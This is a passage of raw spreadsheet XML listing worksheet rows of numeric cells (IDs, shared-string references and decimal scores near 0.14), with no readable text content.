        <v>1.0</v>
      </c>
      <c r="E23385" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23385" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="23386" ht="15.75" customHeight="1">
      <c r="A23386" s="1">
        <v>25142.0</v>
      </c>
      <c r="B23386" s="2">
        <v>1.3029614E7</v>
      </c>
      <c r="C23386" s="2" t="s">
        <v>22561</v>
      </c>
      <c r="D23386" s="2">
        <v>1.0</v>
      </c>
      <c r="E23386" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23386" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="23387" ht="15.75" customHeight="1">
      <c r="A23387" s="1">
        <v>25189.0</v>
      </c>
      <c r="B23387" s="2">
        <v>1.3171978E7</v>
      </c>
      <c r="C23387" s="2" t="s">
        <v>22562</v>
      </c>
      <c r="D23387" s="2">
        <v>1.0</v>
      </c>
      <c r="E23387" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23387" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="23388" ht="15.75" customHeight="1">
      <c r="A23388" s="1">
        <v>28028.0</v>
      </c>
      <c r="B23388" s="2">
        <v>2.4450527E7</v>
      </c>
      <c r="C23388" s="2" t="s">
        <v>22563</v>
      </c>
      <c r="D23388" s="2">
        <v>1.0</v>
      </c>
      <c r="E23388" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23388" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="23389" ht="15.75" customHeight="1">
      <c r="A23389" s="1">
        <v>28925.0</v>
      </c>
      <c r="B23389" s="2">
        <v>2.9545779E7</v>
      </c>
      <c r="C23389" s="2" t="s">
        <v>22557</v>
      </c>
      <c r="D23389" s="2">
        <v>1.0</v>
      </c>
      <c r="E23389" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23389" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="23390" ht="15.75" customHeight="1">
      <c r="A23390" s="1">
        <v>30227.0</v>
      </c>
      <c r="B23390" s="2">
        <v>3.7432788E7</v>
      </c>
      <c r="C23390" s="2" t="s">
        <v>22564</v>
      </c>
      <c r="D23390" s="2">
        <v>1.0</v>
      </c>
      <c r="E23390" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23390" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="23391" ht="15.75" customHeight="1">
      <c r="A23391" s="1">
        <v>30669.0</v>
      </c>
      <c r="B23391" s="2">
        <v>4.2183851E7</v>
      </c>
      <c r="C23391" s="2" t="s">
        <v>22565</v>
      </c>
      <c r="D23391" s="2">
        <v>1.0</v>
      </c>
      <c r="E23391" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23391" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="23392" ht="15.75" customHeight="1">
      <c r="A23392" s="1">
        <v>31601.0</v>
      </c>
      <c r="B23392" s="2">
        <v>5134320.0</v>
      </c>
      <c r="C23392" s="2" t="s">
        <v>22566</v>
      </c>
      <c r="D23392" s="2">
        <v>1.0</v>
      </c>
      <c r="E23392" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23392" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="23393" ht="15.75" customHeight="1">
      <c r="A23393" s="1">
        <v>33038.0</v>
      </c>
      <c r="B23393" s="2">
        <v>6736732.0</v>
      </c>
      <c r="C23393" s="2" t="s">
        <v>22567</v>
      </c>
      <c r="D23393" s="2">
        <v>1.0</v>
      </c>
      <c r="E23393" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23393" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="23394" ht="15.75" customHeight="1">
      <c r="A23394" s="1">
        <v>23120.0</v>
      </c>
      <c r="B23394" s="2">
        <v>5128699.0</v>
      </c>
      <c r="C23394" s="2" t="s">
        <v>22568</v>
      </c>
      <c r="D23394" s="2">
        <v>1.0</v>
      </c>
      <c r="E23394" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23394" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="23395" ht="15.75" customHeight="1">
      <c r="A23395" s="1">
        <v>25657.0</v>
      </c>
      <c r="B23395" s="2">
        <v>1.4523187E7</v>
      </c>
      <c r="C23395" s="2" t="s">
        <v>22569</v>
      </c>
      <c r="D23395" s="2">
        <v>1.0</v>
      </c>
      <c r="E23395" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23395" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="23396" ht="15.75" customHeight="1">
      <c r="A23396" s="1">
        <v>28599.0</v>
      </c>
      <c r="B23396" s="2">
        <v>2.7025511E7</v>
      </c>
      <c r="C23396" s="2" t="s">
        <v>22570</v>
      </c>
      <c r="D23396" s="2">
        <v>1.0</v>
      </c>
      <c r="E23396" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23396" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="23397" ht="15.75" customHeight="1">
      <c r="A23397" s="1">
        <v>33636.0</v>
      </c>
      <c r="B23397" s="2">
        <v>8364315.0</v>
      </c>
      <c r="C23397" s="2" t="s">
        <v>22571</v>
      </c>
      <c r="D23397" s="2">
        <v>1.0</v>
      </c>
      <c r="E23397" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23397" s="2">
        <v>0.1408045977011494</v>
      </c>
    </row>
    <row r="23398" ht="15.75" customHeight="1">
      <c r="A23398" s="1">
        <v>22536.0</v>
      </c>
      <c r="B23398" s="2">
        <v>3.7937864E7</v>
      </c>
      <c r="C23398" s="2" t="s">
        <v>22572</v>
      </c>
      <c r="D23398" s="2">
        <v>1.0</v>
      </c>
      <c r="E23398" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23398" s="2">
        <v>0.1406810035842294</v>
      </c>
    </row>
    <row r="23399" ht="15.75" customHeight="1">
      <c r="A23399" s="1">
        <v>22341.0</v>
      </c>
      <c r="B23399" s="2">
        <v>3.4489061E7</v>
      </c>
      <c r="C23399" s="2" t="s">
        <v>22502</v>
      </c>
      <c r="D23399" s="2">
        <v>1.0</v>
      </c>
      <c r="E23399" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23399" s="2">
        <v>0.14030131826742</v>
      </c>
    </row>
    <row r="23400" ht="15.75" customHeight="1">
      <c r="A23400" s="1">
        <v>23498.0</v>
      </c>
      <c r="B23400" s="2">
        <v>5.7685261E7</v>
      </c>
      <c r="C23400" s="2" t="s">
        <v>22573</v>
      </c>
      <c r="D23400" s="2">
        <v>1.0</v>
      </c>
      <c r="E23400" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23400" s="2">
        <v>0.14030131826742</v>
      </c>
    </row>
    <row r="23401" ht="15.75" customHeight="1">
      <c r="A23401" s="1">
        <v>24482.0</v>
      </c>
      <c r="B23401" s="2">
        <v>1.1045432E7</v>
      </c>
      <c r="C23401" s="2" t="s">
        <v>22574</v>
      </c>
      <c r="D23401" s="2">
        <v>1.0</v>
      </c>
      <c r="E23401" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23401" s="2">
        <v>0.14030131826742</v>
      </c>
    </row>
    <row r="23402" ht="15.75" customHeight="1">
      <c r="A23402" s="1">
        <v>26114.0</v>
      </c>
      <c r="B23402" s="2">
        <v>1.585498E7</v>
      </c>
      <c r="C23402" s="2" t="s">
        <v>22575</v>
      </c>
      <c r="D23402" s="2">
        <v>1.0</v>
      </c>
      <c r="E23402" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23402" s="2">
        <v>0.14030131826742</v>
      </c>
    </row>
    <row r="23403" ht="15.75" customHeight="1">
      <c r="A23403" s="1">
        <v>19664.0</v>
      </c>
      <c r="B23403" s="2">
        <v>5.6367085E7</v>
      </c>
      <c r="C23403" s="2" t="s">
        <v>22576</v>
      </c>
      <c r="D23403" s="2">
        <v>1.0</v>
      </c>
      <c r="E23403" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23403" s="2">
        <v>0.1402116402116403</v>
      </c>
    </row>
    <row r="23404" ht="15.75" customHeight="1">
      <c r="A23404" s="1">
        <v>31955.0</v>
      </c>
      <c r="B23404" s="2">
        <v>5310109.0</v>
      </c>
      <c r="C23404" s="2" t="s">
        <v>22577</v>
      </c>
      <c r="D23404" s="2">
        <v>1.0</v>
      </c>
      <c r="E23404" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23404" s="2">
        <v>0.1402116402116403</v>
      </c>
    </row>
    <row r="23405" ht="15.75" customHeight="1">
      <c r="A23405" s="1">
        <v>26247.0</v>
      </c>
      <c r="B23405" s="2">
        <v>1.6319573E7</v>
      </c>
      <c r="C23405" s="2" t="s">
        <v>22578</v>
      </c>
      <c r="D23405" s="2">
        <v>1.0</v>
      </c>
      <c r="E23405" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23405" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="23406" ht="15.75" customHeight="1">
      <c r="A23406" s="1">
        <v>26999.0</v>
      </c>
      <c r="B23406" s="2">
        <v>1.9872125E7</v>
      </c>
      <c r="C23406" s="2" t="s">
        <v>22579</v>
      </c>
      <c r="D23406" s="2">
        <v>1.0</v>
      </c>
      <c r="E23406" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23406" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="23407" ht="15.75" customHeight="1">
      <c r="A23407" s="1">
        <v>30582.0</v>
      </c>
      <c r="B23407" s="2">
        <v>4.1143202E7</v>
      </c>
      <c r="C23407" s="2" t="s">
        <v>22580</v>
      </c>
      <c r="D23407" s="2">
        <v>1.0</v>
      </c>
      <c r="E23407" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23407" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="23408" ht="15.75" customHeight="1">
      <c r="A23408" s="1">
        <v>21707.0</v>
      </c>
      <c r="B23408" s="2">
        <v>2.5333345E7</v>
      </c>
      <c r="C23408" s="2" t="s">
        <v>22581</v>
      </c>
      <c r="D23408" s="2">
        <v>1.0</v>
      </c>
      <c r="E23408" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23408" s="2">
        <v>0.1398148148148149</v>
      </c>
    </row>
    <row r="23409" ht="15.75" customHeight="1">
      <c r="A23409" s="1">
        <v>215.0</v>
      </c>
      <c r="B23409" s="2">
        <v>1.4587826E7</v>
      </c>
      <c r="C23409" s="2" t="s">
        <v>22582</v>
      </c>
      <c r="D23409" s="2">
        <v>1.0</v>
      </c>
      <c r="E23409" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23409" s="2">
        <v>0.1398148148148148</v>
      </c>
    </row>
    <row r="23410" ht="15.75" customHeight="1">
      <c r="A23410" s="1">
        <v>11289.0</v>
      </c>
      <c r="B23410" s="2">
        <v>2.0889984E7</v>
      </c>
      <c r="C23410" s="2" t="s">
        <v>22583</v>
      </c>
      <c r="D23410" s="2">
        <v>1.0</v>
      </c>
      <c r="E23410" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23410" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="23411" ht="15.75" customHeight="1">
      <c r="A23411" s="1">
        <v>23128.0</v>
      </c>
      <c r="B23411" s="2">
        <v>5.1355689E7</v>
      </c>
      <c r="C23411" s="2" t="s">
        <v>22584</v>
      </c>
      <c r="D23411" s="2">
        <v>1.0</v>
      </c>
      <c r="E23411" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23411" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="23412" ht="15.75" customHeight="1">
      <c r="A23412" s="1">
        <v>23195.0</v>
      </c>
      <c r="B23412" s="2">
        <v>5.2431412E7</v>
      </c>
      <c r="C23412" s="2" t="s">
        <v>22585</v>
      </c>
      <c r="D23412" s="2">
        <v>1.0</v>
      </c>
      <c r="E23412" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23412" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="23413" ht="15.75" customHeight="1">
      <c r="A23413" s="1">
        <v>24829.0</v>
      </c>
      <c r="B23413" s="2">
        <v>1.2123733E7</v>
      </c>
      <c r="C23413" s="2" t="s">
        <v>22586</v>
      </c>
      <c r="D23413" s="2">
        <v>1.0</v>
      </c>
      <c r="E23413" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23413" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="23414" ht="15.75" customHeight="1">
      <c r="A23414" s="1">
        <v>22459.0</v>
      </c>
      <c r="B23414" s="2">
        <v>3.6403381E7</v>
      </c>
      <c r="C23414" s="2" t="s">
        <v>22587</v>
      </c>
      <c r="D23414" s="2">
        <v>1.0</v>
      </c>
      <c r="E23414" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23414" s="2">
        <v>0.1393162393162394</v>
      </c>
    </row>
    <row r="23415" ht="15.75" customHeight="1">
      <c r="A23415" s="1">
        <v>30093.0</v>
      </c>
      <c r="B23415" s="2">
        <v>3.640338E7</v>
      </c>
      <c r="C23415" s="2" t="s">
        <v>22587</v>
      </c>
      <c r="D23415" s="2">
        <v>1.0</v>
      </c>
      <c r="E23415" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23415" s="2">
        <v>0.1393162393162394</v>
      </c>
    </row>
    <row r="23416" ht="15.75" customHeight="1">
      <c r="A23416" s="1">
        <v>21124.0</v>
      </c>
      <c r="B23416" s="2">
        <v>1.8353518E7</v>
      </c>
      <c r="C23416" s="2" t="s">
        <v>22588</v>
      </c>
      <c r="D23416" s="2">
        <v>1.0</v>
      </c>
      <c r="E23416" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23416" s="2">
        <v>0.1393162393162393</v>
      </c>
    </row>
    <row r="23417" ht="15.75" customHeight="1">
      <c r="A23417" s="1">
        <v>30435.0</v>
      </c>
      <c r="B23417" s="2">
        <v>3.9040832E7</v>
      </c>
      <c r="C23417" s="2" t="s">
        <v>22589</v>
      </c>
      <c r="D23417" s="2">
        <v>1.0</v>
      </c>
      <c r="E23417" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23417" s="2">
        <v>0.1393162393162393</v>
      </c>
    </row>
    <row r="23418" ht="15.75" customHeight="1">
      <c r="A23418" s="1">
        <v>31396.0</v>
      </c>
      <c r="B23418" s="2">
        <v>4.9992928E7</v>
      </c>
      <c r="C23418" s="2" t="s">
        <v>22590</v>
      </c>
      <c r="D23418" s="2">
        <v>1.0</v>
      </c>
      <c r="E23418" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23418" s="2">
        <v>0.1393162393162393</v>
      </c>
    </row>
    <row r="23419" ht="15.75" customHeight="1">
      <c r="A23419" s="1">
        <v>20695.0</v>
      </c>
      <c r="B23419" s="2">
        <v>1.4523188E7</v>
      </c>
      <c r="C23419" s="2" t="s">
        <v>22569</v>
      </c>
      <c r="D23419" s="2">
        <v>1.0</v>
      </c>
      <c r="E23419" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23419" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="23420" ht="15.75" customHeight="1">
      <c r="A23420" s="1">
        <v>21006.0</v>
      </c>
      <c r="B23420" s="2">
        <v>1.722602E7</v>
      </c>
      <c r="C23420" s="2" t="s">
        <v>22591</v>
      </c>
      <c r="D23420" s="2">
        <v>1.0</v>
      </c>
      <c r="E23420" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23420" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="23421" ht="15.75" customHeight="1">
      <c r="A23421" s="1">
        <v>24281.0</v>
      </c>
      <c r="B23421" s="2">
        <v>1.0545918E7</v>
      </c>
      <c r="C23421" s="2" t="s">
        <v>22592</v>
      </c>
      <c r="D23421" s="2">
        <v>1.0</v>
      </c>
      <c r="E23421" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23421" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="23422" ht="15.75" customHeight="1">
      <c r="A23422" s="1">
        <v>32470.0</v>
      </c>
      <c r="B23422" s="2">
        <v>5.6871663E7</v>
      </c>
      <c r="C23422" s="2" t="s">
        <v>22593</v>
      </c>
      <c r="D23422" s="2">
        <v>1.0</v>
      </c>
      <c r="E23422" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23422" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="23423" ht="15.75" customHeight="1">
      <c r="A23423" s="1">
        <v>33446.0</v>
      </c>
      <c r="B23423" s="2">
        <v>7861685.0</v>
      </c>
      <c r="C23423" s="2" t="s">
        <v>22594</v>
      </c>
      <c r="D23423" s="2">
        <v>1.0</v>
      </c>
      <c r="E23423" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23423" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="23424" ht="15.75" customHeight="1">
      <c r="A23424" s="1">
        <v>16267.0</v>
      </c>
      <c r="B23424" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C23424" s="2" t="s">
        <v>22595</v>
      </c>
      <c r="D23424" s="2">
        <v>1.0</v>
      </c>
      <c r="E23424" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23424" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="23425" ht="15.75" customHeight="1">
      <c r="A23425" s="1">
        <v>21700.0</v>
      </c>
      <c r="B23425" s="2">
        <v>2.52447E7</v>
      </c>
      <c r="C23425" s="2" t="s">
        <v>22596</v>
      </c>
      <c r="D23425" s="2">
        <v>1.0</v>
      </c>
      <c r="E23425" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23425" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="23426" ht="15.75" customHeight="1">
      <c r="A23426" s="1">
        <v>22916.0</v>
      </c>
      <c r="B23426" s="2">
        <v>4.8330948E7</v>
      </c>
      <c r="C23426" s="2" t="s">
        <v>22597</v>
      </c>
      <c r="D23426" s="2">
        <v>1.0</v>
      </c>
      <c r="E23426" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23426" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="23427" ht="15.75" customHeight="1">
      <c r="A23427" s="1">
        <v>24188.0</v>
      </c>
      <c r="B23427" s="2">
        <v>1.0276009E7</v>
      </c>
      <c r="C23427" s="2" t="s">
        <v>22598</v>
      </c>
      <c r="D23427" s="2">
        <v>1.0</v>
      </c>
      <c r="E23427" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23427" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="23428" ht="15.75" customHeight="1">
      <c r="A23428" s="1">
        <v>25486.0</v>
      </c>
      <c r="B23428" s="2">
        <v>1.4028153E7</v>
      </c>
      <c r="C23428" s="2" t="s">
        <v>22599</v>
      </c>
      <c r="D23428" s="2">
        <v>1.0</v>
      </c>
      <c r="E23428" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23428" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="23429" ht="15.75" customHeight="1">
      <c r="A23429" s="1">
        <v>25898.0</v>
      </c>
      <c r="B23429" s="2">
        <v>1.5035155E7</v>
      </c>
      <c r="C23429" s="2" t="s">
        <v>22600</v>
      </c>
      <c r="D23429" s="2">
        <v>1.0</v>
      </c>
      <c r="E23429" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23429" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="23430" ht="15.75" customHeight="1">
      <c r="A23430" s="1">
        <v>28248.0</v>
      </c>
      <c r="B23430" s="2">
        <v>2.5244699E7</v>
      </c>
      <c r="C23430" s="2" t="s">
        <v>22596</v>
      </c>
      <c r="D23430" s="2">
        <v>1.0</v>
      </c>
      <c r="E23430" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23430" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="23431" ht="15.75" customHeight="1">
      <c r="A23431" s="1">
        <v>29970.0</v>
      </c>
      <c r="B23431" s="2">
        <v>3609187.0</v>
      </c>
      <c r="C23431" s="2" t="s">
        <v>22601</v>
      </c>
      <c r="D23431" s="2">
        <v>1.0</v>
      </c>
      <c r="E23431" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23431" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="23432" ht="15.75" customHeight="1">
      <c r="A23432" s="1">
        <v>30948.0</v>
      </c>
      <c r="B23432" s="2">
        <v>4.7336868E7</v>
      </c>
      <c r="C23432" s="2" t="s">
        <v>22602</v>
      </c>
      <c r="D23432" s="2">
        <v>1.0</v>
      </c>
      <c r="E23432" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23432" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="23433" ht="15.75" customHeight="1">
      <c r="A23433" s="1">
        <v>33401.0</v>
      </c>
      <c r="B23433" s="2">
        <v>7713638.0</v>
      </c>
      <c r="C23433" s="2" t="s">
        <v>22603</v>
      </c>
      <c r="D23433" s="2">
        <v>1.0</v>
      </c>
      <c r="E23433" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23433" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="23434" ht="15.75" customHeight="1">
      <c r="A23434" s="1">
        <v>33535.0</v>
      </c>
      <c r="B23434" s="2">
        <v>8148794.0</v>
      </c>
      <c r="C23434" s="2" t="s">
        <v>22604</v>
      </c>
      <c r="D23434" s="2">
        <v>1.0</v>
      </c>
      <c r="E23434" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23434" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="23435" ht="15.75" customHeight="1">
      <c r="A23435" s="1">
        <v>26913.0</v>
      </c>
      <c r="B23435" s="2">
        <v>1.9351279E7</v>
      </c>
      <c r="C23435" s="2" t="s">
        <v>22605</v>
      </c>
      <c r="D23435" s="2">
        <v>1.0</v>
      </c>
      <c r="E23435" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23435" s="2">
        <v>0.1384479717813051</v>
      </c>
    </row>
    <row r="23436" ht="15.75" customHeight="1">
      <c r="A23436" s="1">
        <v>7538.0</v>
      </c>
      <c r="B23436" s="2">
        <v>5.1470923E7</v>
      </c>
      <c r="C23436" s="2" t="s">
        <v>22606</v>
      </c>
      <c r="D23436" s="2">
        <v>1.0</v>
      </c>
      <c r="E23436" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23436" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="23437" ht="15.75" customHeight="1">
      <c r="A23437" s="1">
        <v>23390.0</v>
      </c>
      <c r="B23437" s="2">
        <v>5.566089E7</v>
      </c>
      <c r="C23437" s="2" t="s">
        <v>22607</v>
      </c>
      <c r="D23437" s="2">
        <v>1.0</v>
      </c>
      <c r="E23437" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23437" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="23438" ht="15.75" customHeight="1">
      <c r="A23438" s="1">
        <v>23635.0</v>
      </c>
      <c r="B23438" s="2">
        <v>6615467.0</v>
      </c>
      <c r="C23438" s="2" t="s">
        <v>22608</v>
      </c>
      <c r="D23438" s="2">
        <v>1.0</v>
      </c>
      <c r="E23438" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23438" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="23439" ht="15.75" customHeight="1">
      <c r="A23439" s="1">
        <v>24278.0</v>
      </c>
      <c r="B23439" s="2">
        <v>1.0541409E7</v>
      </c>
      <c r="C23439" s="2" t="s">
        <v>22609</v>
      </c>
      <c r="D23439" s="2">
        <v>1.0</v>
      </c>
      <c r="E23439" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23439" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="23440" ht="15.75" customHeight="1">
      <c r="A23440" s="1">
        <v>24677.0</v>
      </c>
      <c r="B23440" s="2">
        <v>1.1584825E7</v>
      </c>
      <c r="C23440" s="2" t="s">
        <v>22610</v>
      </c>
      <c r="D23440" s="2">
        <v>1.0</v>
      </c>
      <c r="E23440" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23440" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="23441" ht="15.75" customHeight="1">
      <c r="A23441" s="1">
        <v>25617.0</v>
      </c>
      <c r="B23441" s="2">
        <v>1.4402219E7</v>
      </c>
      <c r="C23441" s="2" t="s">
        <v>22611</v>
      </c>
      <c r="D23441" s="2">
        <v>1.0</v>
      </c>
      <c r="E23441" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23441" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="23442" ht="15.75" customHeight="1">
      <c r="A23442" s="1">
        <v>26517.0</v>
      </c>
      <c r="B23442" s="2">
        <v>1.7633074E7</v>
      </c>
      <c r="C23442" s="2" t="s">
        <v>22612</v>
      </c>
      <c r="D23442" s="2">
        <v>1.0</v>
      </c>
      <c r="E23442" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23442" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="23443" ht="15.75" customHeight="1">
      <c r="A23443" s="1">
        <v>27048.0</v>
      </c>
      <c r="B23443" s="2">
        <v>2.0262983E7</v>
      </c>
      <c r="C23443" s="2" t="s">
        <v>22613</v>
      </c>
      <c r="D23443" s="2">
        <v>1.0</v>
      </c>
      <c r="E23443" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23443" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="23444" ht="15.75" customHeight="1">
      <c r="A23444" s="1">
        <v>29908.0</v>
      </c>
      <c r="B23444" s="2">
        <v>3607050.0</v>
      </c>
      <c r="C23444" s="2" t="s">
        <v>22614</v>
      </c>
      <c r="D23444" s="2">
        <v>1.0</v>
      </c>
      <c r="E23444" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23444" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="23445" ht="15.75" customHeight="1">
      <c r="A23445" s="1">
        <v>31989.0</v>
      </c>
      <c r="B23445" s="2">
        <v>5329326.0</v>
      </c>
      <c r="C23445" s="2" t="s">
        <v>22615</v>
      </c>
      <c r="D23445" s="2">
        <v>1.0</v>
      </c>
      <c r="E23445" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23445" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="23446" ht="15.75" customHeight="1">
      <c r="A23446" s="1">
        <v>32994.0</v>
      </c>
      <c r="B23446" s="2">
        <v>6615466.0</v>
      </c>
      <c r="C23446" s="2" t="s">
        <v>22616</v>
      </c>
      <c r="D23446" s="2">
        <v>1.0</v>
      </c>
      <c r="E23446" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23446" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="23447" ht="15.75" customHeight="1">
      <c r="A23447" s="1">
        <v>33388.0</v>
      </c>
      <c r="B23447" s="2">
        <v>7659495.0</v>
      </c>
      <c r="C23447" s="2" t="s">
        <v>22617</v>
      </c>
      <c r="D23447" s="2">
        <v>1.0</v>
      </c>
      <c r="E23447" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23447" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="23448" ht="15.75" customHeight="1">
      <c r="A23448" s="1">
        <v>23178.0</v>
      </c>
      <c r="B23448" s="2">
        <v>5.2155162E7</v>
      </c>
      <c r="C23448" s="2" t="s">
        <v>22618</v>
      </c>
      <c r="D23448" s="2">
        <v>1.0</v>
      </c>
      <c r="E23448" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23448" s="2">
        <v>0.1383838383838384</v>
      </c>
    </row>
    <row r="23449" ht="15.75" customHeight="1">
      <c r="A23449" s="1">
        <v>25399.0</v>
      </c>
      <c r="B23449" s="2">
        <v>1.373591E7</v>
      </c>
      <c r="C23449" s="2" t="s">
        <v>22619</v>
      </c>
      <c r="D23449" s="2">
        <v>1.0</v>
      </c>
      <c r="E23449" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23449" s="2">
        <v>0.1383838383838384</v>
      </c>
    </row>
    <row r="23450" ht="15.75" customHeight="1">
      <c r="A23450" s="1">
        <v>30225.0</v>
      </c>
      <c r="B23450" s="2">
        <v>3.7430369E7</v>
      </c>
      <c r="C23450" s="2" t="s">
        <v>22619</v>
      </c>
      <c r="D23450" s="2">
        <v>1.0</v>
      </c>
      <c r="E23450" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23450" s="2">
        <v>0.1383838383838384</v>
      </c>
    </row>
    <row r="23451" ht="15.75" customHeight="1">
      <c r="A23451" s="1">
        <v>27871.0</v>
      </c>
      <c r="B23451" s="2">
        <v>2.3538154E7</v>
      </c>
      <c r="C23451" s="2" t="s">
        <v>22620</v>
      </c>
      <c r="D23451" s="2">
        <v>1.0</v>
      </c>
      <c r="E23451" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23451" s="2">
        <v>0.1380718954248366</v>
      </c>
    </row>
    <row r="23452" ht="15.75" customHeight="1">
      <c r="A23452" s="1">
        <v>23861.0</v>
      </c>
      <c r="B23452" s="2">
        <v>8325487.0</v>
      </c>
      <c r="C23452" s="2" t="s">
        <v>22621</v>
      </c>
      <c r="D23452" s="2">
        <v>1.0</v>
      </c>
      <c r="E23452" s="3" t="s">
